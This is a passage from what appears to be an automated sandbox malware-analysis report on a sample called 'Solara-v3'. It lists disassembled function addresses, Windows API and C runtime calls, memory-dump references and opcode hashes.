                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                              • Opcode ID: 49eb7c3c2da03d521ebf31b1a8bf6c0a44f8dce97421eb1885dc6e307e771408
                                                                                                                                                                                                                                              • Instruction ID: a47f2c868164ed6da4ce80f72148801b5e21b80e83effaefc20224862b9d628e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49eb7c3c2da03d521ebf31b1a8bf6c0a44f8dce97421eb1885dc6e307e771408
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EBF0EC3570034557CB049F35DCB57AA7FA4EFC1B64F4A4058EE158B151C671D942D790
                                                                                                                                                                                                                                              Function 00CACC15 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00CA6E33,?,20001004,00000000,00000002,?,?,00CA5D3D), ref: 00CACC49
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                                              • Opcode ID: 5d29276991cce7610301c841ad8b52a9237149fe29a53554905255418a8afc03
                                                                                                                                                                                                                                              • Instruction ID: 886293f9060afbe6b26c0c66f825b7a0eccb2873d0a3c295584a010d723271a9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d29276991cce7610301c841ad8b52a9237149fe29a53554905255418a8afc03
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83E04F3150122DBBCF122F61EE04F9E7E16EF45B65F044021FD1566221CB358921AB90
                                                                                                                                                                                                                                              Function 00C9F8DD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 00C9F8E2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                              • Opcode ID: 810a155a378b55b6193894419cc794335c509e3beb098dfe13bb651dc6c61ad4
                                                                                                                                                                                                                                              • Instruction ID: a8bcc4a424c8728f3982bfb8fdb6a5ec7c052ebe60b1d3a8325e429b32f1c4a2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 810a155a378b55b6193894419cc794335c509e3beb098dfe13bb651dc6c61ad4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                              Function 00CAD8E0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                                              • Opcode ID: 8ccf319738d917f5900d2fc1cd205eb8edea694ef54c6053b217cd7b73cb0c1b
                                                                                                                                                                                                                                              • Instruction ID: 97fcb1a7b164ef6bde9a7c338e0f0a29b0a553d1c85cbc5fa6b991149637c18d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ccf319738d917f5900d2fc1cd205eb8edea694ef54c6053b217cd7b73cb0c1b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FDA001706012028B97448F36EE19B0D3AA9AA45AD17058079E946C6164EA349494AF46
                                                                                                                                                                                                                                              Function 00CBAAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(032E4738,032E4738,00000000,7FFFFFFF,?,00CBAACD,032E4738,032E4738,00000000,032E4738,?,?,?,?,032E4738,00000000), ref: 00CBAB88
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00CBAC43
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00CBACD2
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CBAD1D
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CBAD23
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CBAD59
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CBAD5F
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CBAD6F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 127012223-0
                                                                                                                                                                                                                                              • Opcode ID: b608f18d578ab03d40588e7bd709b863bd471a4b95cab0adef1f0c866427225d
                                                                                                                                                                                                                                              • Instruction ID: baa90513af75e60df0bf795bd0072724dc61c910314f7f13e4015ec782ef0c4e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b608f18d578ab03d40588e7bd709b863bd471a4b95cab0adef1f0c866427225d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B771D87290020AABDF319F64CC41FEF7BBADF45310F290059E9A4A7192E7359E419792
                                                                                                                                                                                                                                              Function 00C9FE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00C9FE70
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00C9FE9C
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00C9FEDB
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C9FEF8
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C9FF37
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00C9FF54
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00C9FF96
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00C9FFB9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2040435927-0
                                                                                                                                                                                                                                              • Opcode ID: 45fb3afe7c14b39a0f3d3d5fda312c7986fe1e6cdf6589a7077fe6c9c0b13f2c
                                                                                                                                                                                                                                              • Instruction ID: 6a3fe445a5f90fe5cd29ca477b17a74fb524b321a2a13b155bc493647320846c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45fb3afe7c14b39a0f3d3d5fda312c7986fe1e6cdf6589a7077fe6c9c0b13f2c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63518C7260021AAFEF205FA1CC49FAA7BF9EF41754F244439F925DA1A0D730CD129B60
                                                                                                                                                                                                                                              Function 00CAEE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                                                                                              • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                              • Instruction ID: 4617277c9166d252428a5f83436a84e547114d712b0b6fd9611559e9971439a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72B14872A003579FDB118FA4CC81BEEBBA5EF56318F144169E954AB382D6749E02C7E0
                                                                                                                                                                                                                                              Function 00CA0D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CA0D77
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CA0D7F
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CA0E08
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00CA0E33
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CA0E88
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 6ca5ec5b44e2eec9ed2f48eff890f80925f12bdaac0079709efa3fcf7a002f1c
                                                                                                                                                                                                                                              • Instruction ID: 0ffe21d563fef630f30f9d8d35780f3cad4bc6870d1c10a84fb02c25c219f177
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ca5ec5b44e2eec9ed2f48eff890f80925f12bdaac0079709efa3fcf7a002f1c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54410730E0021E9BCF10DF68C885A9E7BB5AF46358F248555F9155B393D731AE11DB90
                                                                                                                                                                                                                                              Function 00CA0080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CA0086
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00CA0094
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00CA00A5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                              • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                              • Opcode ID: c880fdf94e2cdc7ad2c8fe2cc696eab4ff874da8e31195276efff2317a950719
                                                                                                                                                                                                                                              • Instruction ID: 0de4e9b997e5fd6b0e9685be1fa13a83a0c1b091f76c41c46dd3568c502bcfd8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c880fdf94e2cdc7ad2c8fe2cc696eab4ff874da8e31195276efff2317a950719
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1D0C7315412106B83109FB4FD0DFCD3EB9FA09711311816BF445D2760DF7545018758
                                                                                                                                                                                                                                              Function 00CB4F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 356d3efaf072eba1e6af91efb35185e00925d08c57c4235b7b7a476b38010eda
                                                                                                                                                                                                                                              • Instruction ID: 7c466a466b04c61ec36f489d3a4ff630beb2517734b73c1ecbcf4745b183cd38
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 356d3efaf072eba1e6af91efb35185e00925d08c57c4235b7b7a476b38010eda
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AB12470E08A499FDB05DFA9D881BEEBBB4BF46304F144258F511AB392C7719E41CBA1
                                                                                                                                                                                                                                              Function 00C99B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99C97
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CA8
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CBC
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CDD
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CEE
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99D06
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2134207285-0
                                                                                                                                                                                                                                              • Opcode ID: 0bac659b62ddd5e00b6e7ff89eaefbc1eb09212985416604bf6332b567dab384
                                                                                                                                                                                                                                              • Instruction ID: e7719b9e1c8a020963ba341ce1e3916c9e2f722c28e65b6a491fc010db7951b6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bac659b62ddd5e00b6e7ff89eaefbc1eb09212985416604bf6332b567dab384
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C41A0B1900740DBDF30DB698D0A7ABB7F4FF45320F18062DD57A26291D771AA04CBA2
                                                                                                                                                                                                                                              Function 00CAACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00CAACDE,00CA0760,00C9B77F,3F29B6ED,?,?,?,?,00CBBFCA,000000FF), ref: 00CAACF5
                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CAAD03
                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CAAD1C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00CAACDE,00CA0760,00C9B77F,3F29B6ED,?,?,?,?,00CBBFCA,000000FF), ref: 00CAAD6E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
